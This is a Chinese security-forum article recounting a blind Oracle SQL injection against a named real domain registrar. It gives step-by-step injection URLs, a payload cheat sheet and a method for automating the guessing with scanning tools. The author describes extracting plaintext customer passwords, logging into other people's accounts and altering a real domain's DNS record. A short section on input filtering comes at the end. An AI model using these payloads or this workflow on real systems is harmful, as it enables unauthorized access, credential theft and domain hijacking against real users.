首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

万网的尴尬-万网ORACLE注入漏洞曝光


http://www.gipsky.com/
万网的尴尬-万网ORACLE注入漏洞曝光





其实黑客在攻击的时候最重要的是思路,技术我想大家没人敢说自己一定是最好、最新的吧!



万网的尴尬-万网ORACLE注入漏洞曝光

前段时间,手上的项目做完以后,闲着无事,便在网上到处逛逛。看见群里的朋友聊天说自己的什么什么站什么什么论坛开张了。欢迎大家去玩去下载东东,还是.com,.com.cn的域名,很是羡慕啊。虾米时候我才能有自己的主机和顶级域名呢……幻想流口水中……。想到申请主机和域名,自然就想到了中国万网(在中国太有名嘛^_^)。去那里看看吧,看看到底要多少米。顺手就打开了万网的主页。哇咔,一台标准的ASP.NET主机一年要1600大元……一个域名要200。刚想算了,又看到了主页右上角的会员登陆界面,平时做安全的习惯让我“贼”心又起。呵呵,那就来看看能不能发现什么漏洞,弄个会员就好拉,反正现在也没什么事做。

随便在网站内转了转,在关于万网里看到:万网(www.net.cn)是中国最大的域名和网站托管服务提供商。是中国互联网服务行业的旗舰。号称拥有10多年Unix经验的系统工程师、CISCO路由器专家、Orcale数据库专家 、微软MCSE认证工程师、Java/ASP/Perl/C编程高手和网络安全专家。咳咳……汗。这种大网站服务器的安全措施恐怕不知道做了N条。说不定做了映射,加了N高级的IDS和FW,说不定还做了蜜罐等着呢,补丁肯定素早打全了。拿出端口扫描的工具扫了一下……郁闷了……。看来直接从服务器入侵是没什么希望了……

继续转了转,发现了一个情况,嘿嘿,万网的站点使用ASP写的。要知道,前段时间ASP MSSQL的注入可是闹的沸沸扬扬,不少站点都吃了苦头。万网这种大网站,会有这种问题吗?不管了,先试一试再说。找了个链接:

http://www.net.cn/HAS_Client/buy/vir_ ... t1_SB.asp?PackageID=10341

这是个购买虚拟主机的页面,先用经典的and 1=1 and 1=2方法来测试了一下。我晕~全部都是返回类型不匹配: 'CDbl'错误。唉,难道真的是不行了吗?还是不甘心,再来看一看用的什么数据库吧。在参数后面加上一个单引号,提交,页面返回错误:

OraOLEDB 错误 '80004005'

ORA-01756: 括号内的字符串没有正确结束

/HAS_Client/buy/vir_host/vir_host1_SB.asp,行285

哈哈,原来用的是ORACLE。难怪。而一般用ORACLE数据库出现这样的返回错误,都是可能存在问题的。这和MSSQL出现什么未闭合的引号的返回错误差不多,不过MSSQL出现那样的错误提示我们就几乎可以肯定存在注入漏洞了,而ORACLE则要再进一步确定一下。



一下子来了精神,继续做进一步的判定。注意,以下几步的判定是我们后面的入侵的基础,非常重要。

我们再分别提交:

http://www.net.cn/HAS_Client/buy/vir_ ... ?PackageID=10341'and 0<;>(select count(*) from all_tables) and '1'='1

http://www.net.cn/HAS_Client/buy/vir_ ... ?PackageID=10341'and 0<;>(select count(*) from user_tables) and '1'='1

http://www.net.cn/HAS_Client/buy/vir_ ... ?PackageID=10341'and 0<;>(select count(*) from user_tab_columns) and '1'='1

这几个是看看有没有有没有我们猜测的ORACLE的系统表all_tables,user_tables和user_tab_columns。我们以后的渗透都要靠这几个系统表才能完成。如果没有,就没的玩拉。



页面全都成功返回了,说明存在猜测的系统表,同时也说明我们提交的SQL语句,程序做了处理。到此,也确认了这个页面确实存在SQL注入漏洞。YEAH!

在给万网发了N封邮件无反应后,我开始了进一步的渗透。

下面,我们就开始正式的注入。当然,如果上面猜测系统表的页面不能正常返回的话……那多半是不能成功了。^_^

首先我们来整理一下思路。数据库中最关键的就是用户的帐号信息,而最最关键的就是用户的用户名和密码。我们首要的目标就是这个。那怎么在ORACLE数据库中定位这个信息呢。我们来这样做,user_tab_columns这个系统表里存放了所有的用户表的列名。我们就从这里下手。提交:

http://www.net.cn/HAS_Client/buy/vir_ ... ?PackageID=10341'and 0<;>(select count(*) from user_tab_columns where column_name like '%PASSWORD%') AND '1'='1

这里的意思是查询user_tab_columns表里有没有包含PASSWORD字串的列名。



页面正确返回,哈哈,说明有列名是包含PASSWORD字串的。

我们也可以测试PWD,ADMIN,PASS等等敏感的字段。这里我们就从PASSWORD这个下手。知道了有包含PASSWORD字串的列名。那我们怎么来知道是什么表包含了这个列名呢?我们这样做,提交

http://www.net.cn/HAS_Client/buy/vir_ ... ?PackageID=10341'and 0<;>(select count(*) from user_tab_columns where column_name like '%PASSWORD%' and substr(table_name,1,1)='A') AND '1'='1

这里的意思是查看数据库中以A开头的表中有没有列名是包含PASSWORD字段的。如果有的话页面就会正确返回。否则就会报错:

Microsoft VBScript 运行时错误 错误 '800a000d'

类型不匹配: 'CDbl'

/HAS_Client/include/vh_getproperty.asp,行46

如图:



可是这样一个个试实在是……太累……26个字母呢……。这里我利用了NBSI的后台管理地址扫描功能来进行自动检测。我们这样做:

NBSI的后台管理地址扫描的地址是由Dict_Admin.txt这个文件来控制的。我们就把文件的内容换成:

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where column_name like '%PASSWORD%' and substr(table_name,1,1)='A') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where column_name like '%PASSWORD%' and substr(table_name,1,1)='B') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where column_name like '%PASSWORD%' and substr(table_name,1,1)='C') AND '1'='1







然后我们在程序中扫描地址中填http://www.net.cn/HAS_Client/buy/vir_host。点开始扫描。NBSI就开始帮我们一个个去GET设定的地址了。这里有一个问题,就是500错误NBSI也会显示在下面的结果栏里,而我们只要它显示返回200 OK的地址。怎么办呢?我们拿出我们的WPE PRO。WPE PRO是一个实时截获修改数据包的工具。我们用它把返回的500错误改成404页面不存在。那NBSI就不会在下面显示这个500错误的地址了。WPE的具体用法我这里就不详细说了,网上有教程的。给出个截图。



这样,可以使我们猜测的效率大大的提高。后面的大规模的猜测也是这样。

通过猜测,我们得到了有以C,D,H,M,S,V开头的表中包含了敏感字段。一个个来看吧。累哦:)

先来看C。数据库中以C开头的数据表可能有很多,到底哪个是我们所需要的那个呢。我们继续来猜测第二位。把Dict_Admin.txt(以下简称ADMIN)文件的内容用全部替换功能换成:

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where column_name like '%PASSWORD%' and substr(table_name,1,2)='CA') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where column_name like '%PASSWORD%' and substr(table_name,1,2)='CB') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where column_name like '%PASSWORD%' and substr(table_name,1,2)='CC') AND '1'='1







再次进行检测。OK,得到我们所需要的那个表的前两个字符是CU。然后再检测第三位。。。如此循环。最后得到包含有敏感列名的以C开头的表明为CUSTOMERMST。看到了CUSTOMER……嘿嘿,有戏哦。当然,猜到五个字符左右的时候,你可以提交

http://www.net.cn/HAS_Client/buy/vir_ ... ?PackageID=10341'and 0<>(select count(*) from user_tables where table_name like '%XXXXX%' and length(table_name)=N) and '1'='1

来确定猜测的表名的长度是多少。这样更准确快捷一些。

猜完了表名,可以提交:

http://www.net.cn/HAS_Client/buy/vir_ ... ?PackageID=10341'and 0<>(select count(*) from user_tables where table_name= 'CUSTOMERMST') and '1'='1

来确认一下。页面正确返回就OK了。:)

继续继续。到现在,我们还不知道具体的列名。下面我们就着手开始猜测CUSTOMERMST表的列名。由于ORACLE没有象MSSQL那样“砰”的一声直接暴字段的功能,所以我们只能去慢慢猜,累啊。。。幸亏个自制的NBSI WPE的土检测器。。。*_*。闲话少说,下面来猜测列名,将ADMIN文件的内容改成:

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where table_name='CUSTOMERMST' and substr(column_name,1,1)='A') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where table_name='CUSTOMERMST' and substr(column_name,1,1)='B') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where table_name='CUSTOMERMST' and substr(column_name,1,1)='C') AND '1'='1







这里的意思是通过猜测来看看在CUSTOMERMST表中存在哪些字母开头的列名。页面正确返回,也就是返回200 OK,那就是存在。



通过检测,知道存在以A,B,C,E,F,G,I,L,M,O,P,R,S,U开头的列名。我晕,这么多。。。没办法,慢慢来吧。先来看A开头的:

这里的方法和上面猜测表名的方法差不多,将ADMIN文件的内容改为:

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where table_name='CUSTOMERMST' and substr(column_name,1,2)='AA') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where table_name='CUSTOMERMST' and substr(column_name,1,2)='AB') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from user_tab_columns where table_name='CUSTOMERMST' and substr(column_name,1,2)='AC') AND '1'='1







OK,得到前两位是AR,继续。。。最后得到列名为AREAID。这里需要注意一点的是,在一位位检测的时候,可能出来多个结果,就说明有多个列名。比如检测以B开头的第二位的时候,BI和BU都返回200 OK,那么就说明有以BI,BU开头的列名,下面要分别去猜。以此类推,最后我们得到了CUSTOMERMST表的所有列名(擦一下汗……):

AREAID

BIRTHDAY

BIZID

BUSINESSSTATUS

CHANNEL_STAFFID

CITYID

CONTACT

COUNTRY

CUSTOMERID

CUSTOMERINDUSTRY

CUSTOMERORIGINTYPE

EMAIL

EMAILBACKUP







PASSWORD







USERID





看名字,就知道CUSTOMERID,PASSWORD和USERID这三个字段是最重要的。



万网在登陆的时候是用一个数字ID和密码登陆的。那么这两个ID到底哪个才是用来登陆的ID呢?我们这样来做。到万网首页登陆框那里,用通过用户名查数字ID的方法查个ID过来。恩。。。用什么用户的名字呢?我们可是对数据的类型一无所知啊。在首页上转了转,发现底部有个万网新客户推荐栏目。仔细看了一下,有个房地产门户-搜房http://www.soufun.com/ 恩,就用soufun这个名字好了~^_^



OK,得到soufun用户的ID是10529112。下面我们就来确定哪个字段才是ID字段。提交:

http://www.net.cn/HAS_Client/buy/vir_ ... ?PackageID=10341'and 0<;>(select count(*) from CUSTOMERMST where CUSTOMERID='10529112') and '1'='1

哇靠,页面没有正确返回,返回了错误。看来不是这个字段。再提交:

http://www.net.cn/HAS_Client/buy/vir_ ... ?PackageID=10341'and 0<;>(select count(*) from CUSTOMERMST where USERID='10529112') and '1'='1

OK,嘿嘿,这次页面正确返回了。看来USERID字段是放用户登陆ID的。同样方法,检测出CUSTOMERID字段是放用户名的。

字段属性知道了,下面开始猜密码了,还是用这个admin用户。当然,还是要一位位的猜。终于可以猜密码了,嘿嘿。不累了。将ADMIN文件内容改成:

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from CUSTOMERMST where USERID='10529112' and substr(PASSWORD,1,1)='a') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from CUSTOMERMST where USERID='10529112' and substr(PASSWORD,1,1)='b') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from CUSTOMERMST where USERID='10529112' and substr(PASSWORD,1,1)='c') AND '1'='1







vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from CUSTOMERMST where USERID='10529112' and substr(PASSWORD,1,1)='0') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from CUSTOMERMST where USERID='10529112' and substr(PASSWORD,1,1)='1') AND '1'='1

vir_host1_SB.asp?PackageID=10341'and 0<>(select count(*) from CUSTOMERMST where USERID='10529112' and substr(PASSWORD,1,1)='2') AND '1'='1







这里要加上是个阿拉伯数字,密码一般是字母加数字嘛:)。上面就是猜ID为10529112的用户的密码的第一位。几秒过后,密码第一位出来了,是n。继续猜第二位,方法和上面猜表名,列名的方法一样,唯一不同的就是这里不会出现多个结果了。最后得到ID是10529112的用户的密码是n****。我晕,密码竟然不加密。。。数据库和安全专家呢。。。?

猜出了密码,恩,来登陆一下SEESEE,嘿嘿。





哈哈,登陆OK!。。。可用金额竟然素-130元……,晕!还能透支的?欺骗偶滴感情T_T。不怕!找到存钱的字段,UPDATE!嘿嘿……可惜我试了N次都不知道该怎么正确的执行update和insert,5555555。哪位高手有好的方法,大家交流一下:)

当然,登陆进去以后就有了这个帐户的一切权利。先来看看已付款产品管理。……什么东东都没有,晕!再来看看这个用户的财务信息:



恩……打开最近的一笔交易。发现是转了130大元到了10144167。难道10144167这个帐号才素有钱人?:P

马上破解出10144167的密码u******,登陆进去。哈哈,原来是域名分销联盟伙伴,有钱人~余额329^_^.再打开已付款产品管理,再哈哈,这么多域名啊~:P



打开页面底部的域名解析综合服务,HOHO找到了中文通用域名注册-搜房网.中国。点击,就来到了搜房网.中国的域名解析服务页面,这里我们可以随意更改搜房网.中国的解析,来控制域名指向。

说到这里,我的心思已经不是去弄个会员了。因为这样的危害实在是太大了。想想看,我们得到了用户帐号和密码,登陆进去,就可以轻易更改用户购买的域名的指向,指到我们指定的位置。试想一个恶意的攻击者,把某个商业站点的域名指向指到自己制作的一个假的站点去,那么用户登陆这个商业站点的帐号信息也就等于毫无安全可言了。我们访问在万网注册域名的网站将全部乱套。而对于购买了虚拟主机服务的用户来说,危害就是,攻击者通过万网提供的网站管理系统,可以完全控制网站,这个危害就不用说了。

对于万网来说,其所有的业务都有可能受到影响,数据可以被任意获取篡改,我想没有客户敢这样申请业务吧,呵呵。

比如就用上面的那个拥有很多域名的用户来做个演示。我想让szsxmd.gd.cn这个域名解析到著名的www.xfocus.net安全焦点。首先我PING一下www.xfocus.net得到IP为202.106.127.50。然后,我进入域名解析综合业务,在szsxmd.gd.cn这个域名的解析业务里加一条记录,指定解析IP为202.106.127.50 。如图:



过了几个小时以后,域名解析生效,我们再访问szsxmd.gd.cn时,就会发现,我们来到了安全焦点的页面:)



而在命令行中PING szsxmd.gd.cn时,会发现,地址解析为202.106.127.50:)



其他的一些危害是显而易见的,并且比较大,我就不再做实际的演示了。

数据库可以说是一个站点的重中之重。通过这个注入漏洞,我们完全可以控制数据库中的数据,不光光是用户帐号的信息,所有存在数据库中的数据,我们都可以获取,体力活而已了。在开放PUBLIC组的UTL_FILE权限的情况下,其实还可以用UNION查询读取服务器上的文件,这点和PHP MYSQL注入中的load_file()有些相似。当然也可以执行UPDATE之类的。只是在ORACLE注入上,我还是个菜鸟,还没能更新插入数据和进行更高级的注入攻击。而且ORACLE的注入只能一位位的去猜,并且没有自动化的工具。我是利用了NBSI的后台扫描功能和WPE来提高了效率。不过我相信,高手是很多的,自动化的工具也很快就会出现。^_^

这里总结一下一些注入时用到的语句:

0〈〉(select count(*) from all_tables) and ’1’=’1 猜测是否有all_tables系统表,确认注入

0〈〉(select count(*) from user_tab_columns where column_name like ’%列名关键字%’) AND ’1’=’1 猜测是否有包含定义关键字的列名

0〈〉(select count(*) from user_tab_columns where column_name like ’%列名关键字%’ and substr(table_name,1,1)=’A’) AND ’1’=’1 包含关键列名的表中是否有以A开头的。即开始一位位猜表。

0〈〉(select count(*) from user_tables where table_name like ’%表名关键字%’ and length(table_name)=N) and ’1’=’1 猜测包表名含有关键字的表的长度

0〈〉(select count(*) from user_tab_columns where table_name=’表名’ and substr(column_name,1,1)=’A’) AND ’1’=’1 猜测列名

0〈〉(select count(*) from 表名 where 列名1=’XXXXXXXX’ and substr(列名2,1,1)=’a’) AND ’1’=’1 猜测数据

那么,ORACLE注入漏洞的原理是什么呢?这里我就简单的介绍一下。就拿我们注入的这个页面来说。

http://www.net.cn/HAS_Client/buy/vir_ ... t1_SB.asp?PackageID=10341

在ASP程序的源码中的查询语句可能是:

select * from TABLE where PACKAGEID =’10341’

因为作为一个非开源程序的攻击者来说,我们无从知道ASP程序中的源码究竟是什么样子的,只能通过返回的错误信息来判断大概的结构。所以这里我是举个大概的样子。

闲话少说。我们一起来分析。当我们访问这个页面时,ASP程序就根据URL中提交的参数10341去查询了TABLE表中PACKAGEID为10341的数据并且把它返回给我们。从我们测试的情况看,这个参数并没有做过滤就放到了查询语句中,这就给我们的注入提供了条件。当我们提http://www.net.cn/HAS_Client/buy/vir_ ... t1_SB.asp?PackageID=10341’and 0<>(select count(*) from all_tables) and ‘1’=’1 时。在ASP程序中的查询语句就变成了这样:

select * from TABLE where PACKAGEID =’10341’ and 0<>(select count(*) from all_tables) and ‘1’=’1’

这样我们就成功的把我们想执行的查询语句插入了ASP程序原来的查询语句中。这里和MSSQL有所不同的是,我们不能用?符号将后面的语句注释掉,后面的and ‘1’=’1就是为了匹配多出来的那个引号,从而使整个查询语句成立,正常返回页面。比如提http://www.net.cn/HAS_Client/buy/vir_ ... t1_SB.asp?PackageID=10341’and 0<>(select count(*) from all_tables) and ‘1’=’1’ and ‘x’=’x 整个页面也是正常返回的^_^。

其实要防止这种注入很简单,只要对在URL中提交的参数进行严格的过滤,去除一些比如单引号,SQL关键字等不应该出现的字符,应该来说,攻击者就没有什么机会了。具体的做法可以是检查提交的URL中?号后面的字符串,发现有单引号,分号,SQL关键字等不该出现的字符的,马上就跳转到一个自定义的ERROR页面。个人认为这样是比较好的方法。尤其对于非开源程序的攻击者来说,几乎就是绝路了。

网络安全是多方面的,每个环节都必须要时刻注意。可以用一个链条来做比喻,如果这个链条中任意一个环节出了问题,那么整个链就断了。就像万网的这个漏洞,虽然只是一个很小很小的问题,但是其影响是很大的,可以轻易的改变万网客户域名指向。如果我把很多的域名都指向某个站点,那这个站点就相当于瘫掉了。所以网络上的安全不是某家或者某些人的事情,而是需要我们整体从上到下都去做好,才可以。另外,自从经历了许许多多的蠕虫,病毒的攻击以后,大家普遍对自己服务器的安全关注起来,装FW,IDS,电信也参与进来封了一些端口。有些站点甚至就只开了80口。那么在服务器上运行的代码的安全,就显得格外的重要了。一个小小地方的小小疏忽,就有可能造成全局的崩溃。防御技术在不断进步,攻击手段也在不断翻新。今天有SQL注入,明天又会出现什么呢?时刻关注最新的攻击手段,我想对于一个优秀的管理员是非常重要的。遗憾的是现在有许多程序员在编写代码时还没有一个安全意识,而管理员只是把写好的代码放到服务器上,管好服务器的安全(我们公司也是这样,呵呵),代码的编写漏洞,就成为了一个突破口。我从高中就开始关注安全的问题,现在也在从事这方面的工作。可以说现在的网络比起以前,安全了太多太多,但是技术在进步,今天的安全不代表明天的安全。安全是一个永恒的话题。我个人的感觉是,那些蠕虫,病毒,是加强网管们安全意识的最有力武器,同样我相信,利用代码缺陷的攻击,也会加强程序员们编写代码时的安全意识。^_^

最后,希望万网解决这个漏洞,对于专家们来说,我想解决这个问题也许只要花不到5分钟。另外,加强一下自己数据库的数据安全,加个密吧。还有,你们的邮件服务器没问题吧?顺便提一下,国内还有很多站点有这样的注入漏洞,比如XX之家,XX部等:)

感谢大家耐心的看完我的陋文。偶水平有限,如果有什么错误,欢迎大家能指正,偶的MSN:war3apollo@hotmail.com。对于外面的世界来说,偶永远是只菜鸟:)。
<< 浅谈Javascript函数劫持 php注射后的提权 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号